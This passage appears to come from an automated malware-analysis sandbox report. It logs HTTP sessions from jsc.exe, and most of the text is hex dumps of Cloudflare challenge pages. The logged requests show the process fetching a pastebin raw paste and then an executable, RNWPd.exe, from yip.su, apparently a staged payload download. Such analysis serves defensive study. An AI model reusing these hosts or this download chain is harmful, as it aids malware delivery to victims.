                                    2024-08-17 22:09:32 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:09:32 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:09:32 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:09:32 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 33 33 33 34 35 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 64 33 32 65 39 32 37 30 66 39 66 27 2c 63 48 61 73 68 3a 20 27 36 64 34 36 39 65 64 30 35 31 63 63 66 64 63 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 72 6f 30 4c 52 30 46 31 76 52 45 5f 6d 49 45 44 5f 35 49 53 7a 4a 31 6e 76 58 73 50 6f 7a 72 4d 6f 33 62 41 68 48 43 6a 51 78 34 2d 31 37 32 33 39 33 32 35 37 32 2d 30 2e 30 2e 31 2e 31 2d 34 31 31 36 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '33345',cRay: '8b4cfd32e9270f9f',cHash: '6d469ed051ccfdc',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=ro0LR0F1vRE_mIED_5ISzJ1nvXsPozrMo3bAhHCjQx4-1723932572-0.0.1.1-4116",cFPWv: 'g',cTTim
                                    2024-08-17 22:09:32 UTC1369INData Raw: 58 71 32 6c 69 74 5f 35 71 61 55 6a 72 73 4f 6a 4b 54 46 55 7a 59 6d 61 78 64 74 5a 42 6b 65 4b 46 6f 6a 53 51 51 65 46 6e 68 4a 31 31 6c 55 66 2e 33 6c 47 72 4d 66 42 57 52 78 4c 56 70 43 41 38 7a 67 34 39 53 62 4c 41 68 5f 34 72 6d 69 36 6e 45 77 73 42 4e 4b 6f 32 45 66 69 4a 6b 4a 78 2e 62 4c 48 45 79 71 50 75 38 38 32 65 43 64 6a 45 37 6f 54 34 4d 73 6d 43 62 74 30 63 4e 34 79 38 75 69 30 63 6d 53 46 79 49 2e 76 4a 39 30 34 48 32 43 48 57 6b 51 55 4e 4e 66 46 68 43 57 41 5a 30 76 77 48 42 30 53 69 56 46 6e 6e 62 42 57 66 4b 43 37 46 75 55 52 4a 34 53 78 42 61 59 6b 55 47 49 76 6d 5f 5f 43 47 46 64 5f 32 79 64 50 70 38 6c 5f 6b 72 44 78 57 74 33 57 79 69 67 79 4c 33 59 33 68 6e 59 78 64 30 5a 32 6e 45 34 61 30 65 61 71 37 52 6c 56 50 53 4d 38 2e 39 70
                                    Data Ascii: Xq2lit_5qaUjrsOjKTFUzYmaxdtZBkeKFojSQQeFnhJ11lUf.3lGrMfBWRxLVpCA8zg49SbLAh_4rmi6nEwsBNKo2EfiJkJx.bLHEyqPu882eCdjE7oT4MsmCbt0cN4y8ui0cmSFyI.vJ904H2CHWkQUNNfFhCWAZ0vwHB0SiVFnnbBWfKC7FuURJ4SxBaYkUGIvm__CGFd_2ydPp8l_krDxWt3WyigyL3Y3hnYxd0Z2nE4a0eaq7RlVPSM8.9p


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    32192.168.2.549756104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:37 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:37 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:09:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfd52f9190f41-EWR
                                    2024-08-17 22:09:37 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:09:37 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:09:37 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:09:37 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:09:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    33192.168.2.549757188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:38 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:38 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:09:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:09:38 UTC683INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 39 39 34 75 33 5a 36 66 61 44 6a 55 4c 62 45 74 55 76 61 50 2f 54 39 47 55 78 62 68 68 49 6d 49 51 78 68 52 4b 6f 36 2b 34 6c 63 55 6d 2f 56 43 38 50 45 48 55 65 2b 42 49 64 39 73 62 6f 30 54 73 7a 70 65 39 36 4a 4f 35 30 2b 55 6d 44 6c 78 34 70 77 46 50 30 57 4b 32 54 35 66 65 44 6e 46 72 54 37 32 58 73 48 76 2f 4c 49 3d 24 50 79 48 30 38 65 65 7a 62 2f 31 68 43 42 4f 7a 55 6e 34 48 4e 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: 994u3Z6faDjULbEtUvaP/T9GUxbhhImIQxhRKo6+4lcUm/VC8PEHUe+BId9sbo0Tszpe96JO50+UmDlx4pwFP0WK2T5feDnFrT72XsHv/LI=$PyH08eezb/1hCBOzUn4HNA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:09:38 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:09:38 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:09:38 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:09:38 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:09:38 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:09:38 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:09:38 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
